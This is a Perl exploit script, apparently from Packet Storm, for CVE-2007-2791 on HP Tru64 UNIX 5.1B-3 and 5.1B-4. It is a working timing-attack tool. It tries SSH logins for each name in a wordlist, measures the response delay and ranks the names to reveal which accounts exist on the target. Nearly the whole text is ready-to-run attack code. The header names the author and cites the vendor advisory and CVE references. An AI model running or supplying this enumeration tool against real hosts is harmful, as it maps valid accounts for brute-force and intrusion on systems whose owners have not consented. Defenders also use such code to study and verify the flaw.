HP Tru64 remote secure shell user enumeration exploit.
08abc2bc8e46245c8a000cd064c55c818fc2dd3ec65867d82d5156554ce8a7d2#!/usr/bin/perl
use warnings;
use strict;
#
# Remember: you need to accept ssh key first!
#
use Tie::File;
use Fcntl 'O_RDONLY';
use Expect;
use Time::HiRes qw(gettimeofday);
#
# tru64-sshenum.pl
# HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791).
#
# Author: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# The following supported software versions are affected:
#
# HP Tru64 UNIX v5.1B-4
# HP Tru64 UNIX v5.1B-3
#
# The Hewlett-Packard Company thanks Andrea Purificato for reporting this
# vulnerability to security-alert@hp.com
#
# References:
# - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791
# - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl
#
my $verbose = undef;
my $port = 22;
my $timeout = 10;
print <<BANNER;
$0 - HP Tru64 Remote Secure Shell user enumeration exploit
Andrea "bunker" Purificato - http://rawlab.mindcreations.com
37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
BANNER
print "Usage: $0 <target> <userlist>\n" and exit(-1) if ($#ARGV<1);
my $target = $ARGV[0];
my $wordlist = $ARGV[1];
chomp (my $ssh = `which ssh`);
chomp (my $tel = `which telnet`);
my %htimes; my @atimes;
print "[+] Grabbing banner...\n";
my $exp = Expect->spawn("$tel -l fake $target $port")
or die "Cannot spawn $tel: $!\n";;
#$exp->log_stdout(0);
$exp->expect(5,['SSH|ssh'=>sub{$exp->send(".\n")}]);
$exp->close();
print "[+] Done!\n\n";
sub timing {
my $user = shift @_;
my $t0 = gettimeofday;
my $t1 = undef;
my $exp = Expect->spawn("$ssh -l $user -p $port $target")
or die "Cannot spawn $ssh: $!\n";;
$exp->log_stdout(0);
$exp->expect($timeout,['assword:'=>sub{$exp->send(".\n")}]);
$exp->expect(undef, [ qr'assword|denied'=>sub{$t1=gettimeofday}]);
$t1 = gettimeofday unless ($t1);
$exp->close();
return sprintf "%0.3f", ($t1-$t0);
}
tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY
or die "$wordlist: $!";
print "[+] Started, please wait: ";
for (@wlst_ln) {
print "($_ dup?)" if ($htimes{$_});
my $ret = timing($_);
$htimes{$_} = $ret unless ($htimes{$_});
push @atimes, $ret;
unless ($verbose) { print "." }
else { print "$_\t\t$ret\n" }
}
print " Done!\n\n";
#
# Do whatever you want with time values:
#
# (sorted by values)
#
foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) {
print "$key:\t\t$htimes{$key}\n";
}
exit(0);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed